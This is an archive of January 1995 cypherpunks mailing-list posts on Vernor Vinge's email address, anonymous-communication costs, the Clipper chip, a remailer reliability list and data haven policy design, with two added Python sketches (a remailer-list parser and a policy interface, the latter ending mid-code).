Message-ID: <Pine.BSI.3.91.950109001111.9299A-100000@garnet.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I knew that old compuserve account was good for something.
They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 00:46:58 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501090800.DAA29142@bb.hks.net>
Message-ID: <199501090847.AAA23833@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:

> I began composing a reply precisely to this effect, but was stopped by the
> words "They list...". If the address appears in some standard Compu$erve
> email directory, then this was hardly a major transgression.
> 
> Allow me to suggest a compromise. If some enterprising VV fan would volunteer
> to collect fan mail from c'punks, then forward it all, everyone involved
> might be fairly satisfied.

As I described in a post last summer, I was at a party that Vernor was
at, and several of us stayed over until Sunday afternoon (it being
deep in the mountains of Marin and all, a long drive). Eric Hughes
was there. Anyway, I talked about all this in that post.

Vernor was there until Sunday night, too, when the party hosts drove
him off to SFO (the airport, for the TLA-impaired) and I dropped Eric
off in Berkeley on my way home to Santa Cruz.

The point I'm making? First, Vernor had gotten some Cypherpunks posts
forwarded to him by that time, mostly by Russell Whittaker. He is
well-aware that the Cypherpunks list exists, and one must presume that
if he wanted to be on the list, he could be on it easily. (I doubt his
CompuSlave account is his only one, as he's on the faculty at San
Diego State, and hence has the usual access. I suspect he uses the
CompuServe account for his rec.arts.sf-lovers sort of mail; just a hunch.)

Second, he was aware of--and generally pleased by--the explicit role
"True Names" played in the early motivation for our activities. (As is
well known, the works of Chaum, Vinge, Card, Stephenson, Brunner, and
others played major roles.)

Third, for the curious, he _is_ working on a sequel to "AFUTD."

Contact him if you wish, but bear in mind that the more time he has to
spend reading and answering e-mail, the less work he'll get done on
his SF writing.

(And if he has to spend many hours getting his HyperMIME-JPEG3 SLIP
system running to see "Vernor Rulez!" in 80-point type, he may truly
decide he's been marooned in realtime.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 9 Jan 95 00:56:36 PST
To: wcs@anchor.ho.att.com
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <9501090353.AA13655@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950109002529.25620G-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Jan 1995 wcs@anchor.ho.att.com wrote:

> My initial reaction to "Anonymous video conferencing" was
> "That's when you wear black ski masks and use voice scramblers
> and call from video payphones", i.e. not very useful.
> ("Subcomandata Marcos here...")

Video conferencing was just ONE of the applications of high-bandwidth, 
low-latency anonymous communication.  Maybe it was a bad example.  Here's 
a couple more:

1.  anonymous distributed computing: suppose Alice wants to help Bob 
crack a secret key by using both of their computers, but the algorithm 
entails some heavy exchange of data between them

2.  anonymous remote consulting: Alice is building a nuclear bomb and 
needs help, so she sends a live video feed of her workshop to Bob (and 
has the computer blot out her face in real time).  Bob sends Alice an audio 
only commentary of what Alice is doing wrong.

We tend to focus on the more exotic applications of these tools, but as
mkj pointed out they will have perfectly ordinary uses by people who
simply don't want everyone in the world to be able to know everything
about them. Maybe Alice just wants to call AT&T to ask about their Clipper
phone, and not have everybody realize that and send her a bunch of
propaganda about Voice PGP.  :-) Even now, this may not be as implausible
as it sounds.  What if Alice is using MCI as the long distance carrier,
and MCI happens to be selling Voice PGP? 

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Sun, 8 Jan 95 23:23:39 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
Message-ID: <199501090729.CAA28854@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.BSI.3.91.950109001111.9299A-100000@garnet.msen.com>,
Lou Poppler <lwp@garnet.msen.com> wrote:
>I knew that old compuserve account was good for something.
>They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com

Sigh.  Please don't use this, people.  I'm sure VV has no desire to 
pay for oodles of mail telling him just how much people like him.  Treat
it like a home phone number (of course, some people abuse home phone
numbers of famous folks...).
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxCrChNhgovrPB7dAQF7VgQAqsDQM0h7b0VDmBISGd3o0YqYg4q2HYmQ
m0g7VtnX3yEU1vi9N96HPilMwe2JGs/6Frlvf9IKMmzGAIJxEQzGdMLbow54Il1/
akV9siQAH7BvKwaEWkzO8dDi6nl83ZtawVXIQNacIb5v9oEIQwK/vw4aYWitmDAv
B0eJJUVT1XI=
=u+fn
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxDlzSoZzwIn1bdtAQEXTwGAqVqaYnu+0yy8/d0HSZseTDuxP7BBWqGb
PuzL4Xpu2HE7DDrIaALalplmGIYrHnun
=zr9V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 8 Jan 95 23:54:29 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
Message-ID: <199501090800.DAA29142@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

NOTE: This mutation of this thread has no crypto content, but some (awfully
specific) privacy relevance.

Todd Masco writes:
> Lou Poppler <lwp@garnet.msen.com> wrote:
> >I knew that old compuserve account was good for something.
> >They list Vinge, Vernor  San Diego CA   [email address omitted]
> Sigh.  Please don't use this, people.  I'm sure VV has no desire to 
> pay for oodles of mail telling him just how much people like him.  Treat
> it like a home phone number (of course, some people abuse home phone
> numbers of famous folks...).

I began composing a reply precisely to this effect, but was stopped by the
words "They list...". If the address appears in some standard Compu$erve
email directory, then this was hardly a major transgression.

Allow me to suggest a compromise. If some enterprising VV fan would volunteer
to collect fan mail from c'punks, then forward it all, everyone involved
might be fairly satisfied.

Disclaimer:
I'm not familiar with the details of CI$'s fee schedule; if one pays by sheer
volume and not number of messages, then obviously this approach won't alleviate
the burden. Maybe then someone could volunteer actually to ask VV whether/how
he'd like to hear from fans....

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxDr62f7YYibNzjpAQGxAwP+LloeLQS/BJcZciApmMWEvmOhSaCQJX8u
uuwzprP2ZYTmbsb08lfTHnofS1TXKmoZ3BrYdiqjugaCTKFweg8BSZ2vw5i6KplV
x2ArBnejYPKjtqs3C12mf8WJrgjnKdMZ9LxLgjlE1ymELG1bhH0loIyq3YX3x46G
69hvZyz/qQ8=
=h05K
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxDtAyoZzwIn1bdtAQHLNAF+LEFF+UniR9jrXSZxd6Ia9L5aJIXjFFt3
J9aUAIUQKXf0o5ytM2nHYUvj7v0cWhn6
=e+gV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Mon, 9 Jan 95 00:31:37 PST
To: cypherpunks@toad.com
Subject: More signal than YOU can handle.
Message-ID: <199501090837.DAA29692@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


For the moment, all of the archives that Eric just dropped me are on
ftp://ftp.hks.net/cypherpunks/All

I'll be making some primitive engines to access individual articles by
various means but I thought I'd put 'em up in case anybody else with more
disk space than brains would like to snarf 'em (following the Shulgin
model).

(By the way, Glimpse looks like it'll be ideal, since everything is
 already in its own file, the "since June" archive currently being
 our /usr/spool/news/... dir.)

Look for more info in this space (that sucking sound is my copious
free time).
- - --
Todd.

- -----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLxD1GBNhgovrPB7dAQEOQAQAuTRIVTQOzIbjqrUAFsPu3xHTJAH+3YnX
ickYtw627leo3vs7wD2rxGfHNx6As7JbzSI1JwD26zsb2CMqMGgvQHNQ5eD7rW/N
3ICSWACwESWlnL/rAFvVh69mZDM/IUv5C+eSTVHKdlh3KWYbetRvCgkRNQvGVl58
S06pthGBpJ8=
=f4fe
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxD1nyoZzwIn1bdtAQEv7wGAhSVywzGivjeo9fZwVrYDRaJx596TPVeJ
pjutyvubg3yyKmqFD+Ele62LhiPvhxtX
=pooh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 01:27:51 PST
To: cypherpunks@toad.com
Subject: PV Advocate on Clipper in `95
Message-ID: <199501090933.EAA03532@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Just ran across a pretty nice (IMHO) short piece of media coverage of Clipper
in a local weekly, the [Pioneer] Valley Advocate. This is item #85 in the "Tech
Check" section of their list of "95 Things to Watch for in 1995". Joint authors
of the whole forecast are: Mark Kendall Anderson, Everett Hafner, Stephanie 
Kraft, Tom Mudd, Steve Penhollow, Chris Rohmann, David Simons, Michael Strohl,
and Rob Weir.

  ------------------ begin included text ----------------------
85. Clipper Clipping Along

Unfortunately, the failure of the mainstream media to cover the government's
steamroller tactics in technology policy may well continue. The ``Clipper 
Chip,'' what NSA, CIA and FBI spooks see as the ideal data protection measure,
stands to become national standard if all goes as planned. That is, as more
people communicate with digital devices (computers and TVs and eventually
telephones and faxes) the need to scramble and unscramble communications will
increase -- ideally so that the phone conversation you have with your uncle or
the email you send to a co-worker is private and unintelligible to anyone else.
However, in the brave new world as it currently is being designed, the feds
will also be able to decode every digital signal the Clipper chip scrambles.
Consequently, drug kingpins, mafiosi, and anyone else requiring secure
communications will have it (real data encryption is cheap and relatively easy
to implement), while the remaining information consumers will have Big Brother
to contend with.
  --------------------- end included text ----------------------

FYI, the Advocate accepts letters at 71632.100@compuserve.com.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxEBwmf7YYibNzjpAQFdkgQAkciJkPMXESO9yvl3jKaH7WT6H4wGcgfG
W8KyX2myH1zOmN/aZAQVSWX/Rtrs3r+gTwIlCf7DVhFnp1n+lImzrs/T8pKTx/25
gh30s6sm0AGrxcxCV8rgKbXT4KCdPOlXT+kTp5wWaLYBqbZlogvyQIivW3GLZ1U/
9YnjTb0OXNk=
=DaLq
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxEC7CoZzwIn1bdtAQEl6AGAtktxeMXLzVqxHi/0qhEgGRtlCg5Oq/aa
O/RrNyyqbV8eKzSr/n06bt98bGfRfbgY
=ullh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Sun, 8 Jan 95 13:46:50 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950107103037.10733D-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.950109054255.21650A-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



When we say 'anonymous video-conferencing' here, I take it that's not the 
same as in videophones whereby you sit there and have your mugshot 
transmitted across to the other party... that would be distinctly 
un-anonymous :)

The thing being, say you set up an anonymous-video-or-otherwise-remailer, 
you have to ensure that people don't manage to get into that as such 
would obviously give away the identities of all parties.  Given that 
people can supposedly hack the DOD computer system, that doesn't seem so 
unlikely, so are anonymous-remailers really all that safe?

------------------------------------------------------------------------------
 jrt@AsiaOnline.Net   john@AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.

  Computers   Communications  Reduced Rate IDD Service   Innovative Widgets

 Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

On Sat, 7 Jan 1995, Wei Dai wrote:

> On Sat, 7 Jan 1995, Adam Shostack wrote:
> > 	Anonymous mail has bandwidth costs that are only slightly
> > higher than regular mail.  You could hide quite a bit in most video
> > packets.  The latency is a reflection of the lack of volume, because
> > volume is needed for reordering.  If your favorite remailer gets more
> > mail, the latency will drop.
> 
> Anonymous e-mail that goes through a chain of N remailers will cost at
> least N times as much bandwidth and have N times as much latency as normal
> e-mail.  But e-mail is hardly the state-of-the-art of network
> communication, while anonymous e-mail IS the state of the art for
> anonymous communication.  How long will it take for the technology of
> anonymous video conferencing to develop, for example?  By then, of
> course, those who are not concerned with anonymity will probably have
> things such as full sensory virtual interaction. 
> 
> Note that I SUPPORT anonymous communication, but its costs of bandwidth 
> and latency may be a real obstacle to developing Cryptoanarchy (of the 
> kind described by Tim May) if most people are not willing to put up with 
> those costs.
> 
> Wei Dai
> PGP encrypted mail welcome.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Sun, 8 Jan 95 13:48:45 PST
Subject: Re: ANONYMOUS REMAILERS
In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.950109054852.21650B-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



Oops, what I meant to add onto that last bit was that if you're required 
to keep records of the to and from, and especially the contents, you are 
severely likely to be raided by some govt agency whenever they wanna see 
who said what.

I'd think twice about using a remailer that kept records on it all.

------------------------------------------------------------------------------
 jrt@AsiaOnline.Net   john@AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.

  Computers   Communications  Reduced Rate IDD Service   Innovative Widgets

 Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 9 Jan 95 03:51:37 PST
To: Lou Poppler <lwp@garnet.msen.com>
Subject: Re: Vinge's True Email name ?
In-Reply-To: <Pine.BSI.3.91.950109001111.9299A-100000@garnet.msen.com>
Message-ID: <9501091150.AA22634@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Lou Poppler says:
> I knew that old compuserve account was good for something.
> They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com

Too bad for him that he used his true name. Now lots of "fans" are
going to bother him....

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 9 Jan 95 06:48:43 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501091450.GAA27265@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.bsu.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 9 Jan 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nately   remailer@nately.ucsd.edu         ++++++++++    1:28:30  99.99%
rahul    homer@rahul.net                  **#**##****#     4:31  99.99%
mix      mixmaster@nately.ucsd.edu        ++-+-++-++      48:36  99.99%
penet    anon@anon.penet.fi               *+****+*****    28:32  99.99%
vox      remail@vox.xs4all.nl             -----------  14:34:13  99.99%
usura    usura@replay.com                  -- -+--+***    22:31  99.44%
bsu-cs   nowhere@bsu-cs.bsu.edu           +##**##***+#    23:14  99.26%
ideath   remailer@ideath.goldenbear.com   *  --- -----  2:08:58  99.12%
q        q@c2.org                          --+--*++--   2:33:18  98.62%
soda     remailer@csua.berkeley.edu       -..-.- ...    8:10:14  98.47%
alumni   hal@alumni.caltech.edu           ++ *-**+****     7:37  97.74%
portal   hfinney@shell.portal.com         ** *-#*#*#**     5:32  97.74%
c2       remail@c2.org                    *--*+*    *+  1:13:45  95.50%
desert   remail@desert.xs4all.nl          _.----.---   19:54:01  94.80%
extropia remail@extropia.wimsey.com       ++__   +++++ 13:02:14  84.83%
xs4all   remailer@xs4all.nl               *--    -+***    16:29  76.54%
rebma    remailer@rebma.mn.org            -*___-__-    31:31:05  70.47%
flame    tomaz@flame.sinet.org            -*-*+           29:22  37.83%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


   Comments and suggestions welcome!

Raph Levien
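The listing above is regular enough to parse mechanically. The following is an added example, not part of Raph Levien's post or his pinging software: it reads both halves of the list, applies the key-ID and header rules from the "Options and features" key, and filters remailers by capability and measured reliability. The function names, the thresholds, and the reading of two-field latencies as minutes:seconds are assumptions.

```python
import re

# Constructed excerpt: six entries copied from the listing above so this runs offline.
CAPS = r'''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
'''

STATS = '''
penet    anon@anon.penet.fi               *+****+*****    28:32  99.99%
vox      remail@vox.xs4all.nl             -----------  14:34:13  99.99%
usura    usura@replay.com                  -- -+--+***    22:31  99.44%
portal   hfinney@shell.portal.com         ** *-#*#*#**     5:32  97.74%
c2       remail@c2.org                    *--*+*    *+  1:13:45  95.50%
flame    tomaz@flame.sinet.org            -*-*+           29:22  37.83%
'''

# Header field each remailer class expects, per the "Options and features" key.
HEADER_BY_CLASS = {
    "cpunk": "Request-Remailing-To",
    "eric": "Anon-Send-To",
    "penet": "X-Anon-To",
}

CAP_RE = re.compile(r'\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";')
# The history column may contain blanks, so it is matched lazily and the
# latency and uptime columns are anchored at the end of the line.
STAT_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d\d)\s+(\d+(?:\.\d+)?)%\s*$')


def parse_caps(text):
    """Map short name -> address, header field, flags and PGP key ID."""
    out = {}
    for name, addr, opts in CAP_RE.findall(text):
        words = opts.split()
        flags = {w.rstrip(".") for w in words}
        cls = next((c for c in HEADER_BY_CLASS if c in flags), None)
        key_id = None
        if "pgp." in words:        # trailing period: key is filed under the short name
            key_id = name
        elif "pgp" in words:       # otherwise under the full email address
            key_id = addr
        out[name] = {"address": addr, "header": HEADER_BY_CLASS.get(cls),
                     "flags": flags, "pgp_key_id": key_id}
    return out


def to_seconds(latency):
    """'1:13:45' -> 4425; two-field values are read as minutes:seconds (assumption)."""
    total = 0
    for field in latency.split(":"):
        total = total * 60 + int(field)
    return total


def parse_stats(text):
    """Map short name -> ping history string, average latency (s), uptime (%)."""
    out = {}
    for line in text.splitlines():
        m = STAT_RE.match(line)
        if m:
            name, _addr, history, latency, uptime = m.groups()
            out[name] = {"history": history, "latency_s": to_seconds(latency),
                         "uptime": float(uptime)}
    return out


def candidates(caps, stats, need=("pgp",), min_uptime=99.0, max_latency_s=4 * 3600):
    """Names offering every flag in `need` and meeting both thresholds, fastest first."""
    picks = []
    for name, cap in caps.items():
        stat = stats.get(name)
        if stat is None or not set(need) <= cap["flags"]:
            continue
        if stat["uptime"] >= min_uptime and stat["latency_s"] <= max_latency_s:
            picks.append((stat["latency_s"], name))
    return [name for _, name in sorted(picks)]


if __name__ == "__main__":
    caps, stats = parse_caps(CAPS), parse_stats(STATS)
    for name in candidates(caps, stats, need=("pgp", "hash"), min_uptime=95.0):
        print(name, caps[name]["header"], caps[name]["pgp_key_id"])
```
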




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raul Deluth Miller <rockwell@nova.umd.edu>
Date: Mon, 9 Jan 95 05:11:16 PST
To: cypherpunks@toad.com
Subject: remailers
Message-ID: <199501091310.IAA13683@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm wondering if I understand this remailer debate.  Here's my summary
(based not so much on reading of cypherpunk traffic, but on my
understanding of the basic principles):

(*) define an encrypting mailer protocol (basically, just PGP or some
such).  When a mailer receives an encrypted message, it unpacks

(0) a message which may have been doubly encoded (once by originator,
once by prior remailer to disguise padding) -- if so, must decrypt
twice.
(1) the message to be forwarded, annotated with control info (e.g.
padding, delay, key to reencrypt under)
(2) payment information in whatever format is advertised for that
remailer.

As I understand it the problem with digital cash is defining physical
link for the "cash", without compromising the identity of whoever
paid into the account.

The proposal-to-date involves a guild of remailers.  As I see it, this
would be primarily of value for shuffling cash around -- call it a
guild of bankers instead.  Once you've established your "cash"-net,
presumably with related services such as drop-boxes and temporary
accounts, you could use more flexible mechanisms for anonymous mail,
which feed off the cash net where necessary.

I've not read Chaum(sp?)'s work on encrypted cash, so perhaps I've
ignored some terribly obvious issues.

[No PGP signature -- at the moment, I don't have a host sufficiently
secure to be worth bothering with.]

-- 
Raul D. Miller          N=:((*/pq)&|)@                 NB. public e, y, n=:*/pq
<rockwell@nova.umd.edu> P=:*N/@:#               NB. */-.,e e.&factors t=:*/<:pq
                        1=t|e*d    NB. (,-:<:)pq is four large primes, e medium
x-:d P,:y=:e P,:x                  NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 9 Jan 95 09:09:35 PST
To: cypherpunks@toad.com
Subject: Re: More signal than YOU can handle.
In-Reply-To: <199501090837.DAA29692@bb.hks.net>
Message-ID: <199501091709.JAA25055@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "L. Todd Masco" <cactus@hks.net>

   For the moment, all of the archives that Eric just dropped me are on
   ftp://ftp.hks.net/cypherpunks/All

This includes all the stored messages at toad.com from the beginning
of time up to a few months ago.  I've got a short lacuna at toad.com
from some deletion I never understood, but it's only a few weeks long
and is covered by Todd's archive.

I would like someone to make an official enumeration of the articles
as they passed out to the list for global reference.  You may
self-volunteer by grabbing the archives above and starting.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 9 Jan 95 09:24:53 PST
To: cypherpunks@toad.com
Subject: Re: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501091724.JAA25074@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: dfloyd@io.com

   While programming my data haven code, I am wondering how to guard against
   spamming the data haven parser.

Here's an example of where the mechanism/policy distinction helps a
lot.  Mechanism here is how you store data.  Policy is how you decide
whether to accept a particular request.

The suggestions to date have all suggested particular policies to put
into your code (with the exception of Bill Stewart).  In addition,
almost all of these suggestions have been pay-per-use.  As significant
as policies are, they aren't your most important issue right now.

The single thing you need to get right today is the means of
separating the mechanism from the policy.  Different operators will
have different policies.  If it's difficult to change policies, fewer
services will be offered.

The issue of policy separation is a software architecture one.  I
don't know the structure of your code, but I'd suggest that whatever
it looks like, that you make a (1) clean interface and that you (2)
document it.  If you do these two things, you'll have substantially
achieved separation.

I think you should spend more time worrying about the interface than
about the specific policies.  In order to focus on the policy
interface, I'd suggest an extremely simple policy to work with,
namely, an access list.  Anyone listed can use the server; everyone
else is denied.  That will get you started.

I would distribute your first code with a simple policy such as this.
It will allow prototypes to get worked on.  Since a data haven isn't
of much use without clients for it, a simple policy is adequate for a
first release.

Eric
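The separation described in the message above can be sketched as follows. This is an added example, not code from the message or from dfloyd's data haven: the class and method names are hypothetical, and the requester string is assumed to have been authenticated before it reaches the policy. The mechanism stores bytes, the policy answers one yes/no question, and the access list is the starter policy; a second policy is swapped in without touching the mechanism.

```python
class Policy:
    """Policy interface: answer one question, 'may this request proceed?'."""

    def allow(self, requester, action, size):
        """requester: authenticated identity; action: 'store' or 'fetch';
        size: payload length in bytes (0 for a fetch)."""
        raise NotImplementedError


class AccessListPolicy(Policy):
    """The starter policy from the message: anyone listed may use the server."""

    def __init__(self, allowed):
        self.allowed = frozenset(a.strip().lower() for a in allowed)

    def allow(self, requester, action, size):
        return requester.strip().lower() in self.allowed


class SizeCapPolicy(Policy):
    """A different operator's policy (hypothetical): cap the size of stored objects."""

    def __init__(self, max_bytes):
        self.max_bytes = max_bytes

    def allow(self, requester, action, size):
        return action == "fetch" or size <= self.max_bytes


class AllOf(Policy):
    """Compose policies: every one of them must agree."""

    def __init__(self, *policies):
        self.policies = policies

    def allow(self, requester, action, size):
        return all(p.allow(requester, action, size) for p in self.policies)


class Haven:
    """Mechanism only: stores and returns bytes, asking the policy first."""

    def __init__(self, policy):
        self.policy = policy
        self._blobs = {}
        self._next = 0

    def _permit(self, requester, action, size):
        # Fail closed: a policy that raises, or returns anything but True, denies.
        try:
            ok = self.policy.allow(requester, action, size) is True
        except Exception:
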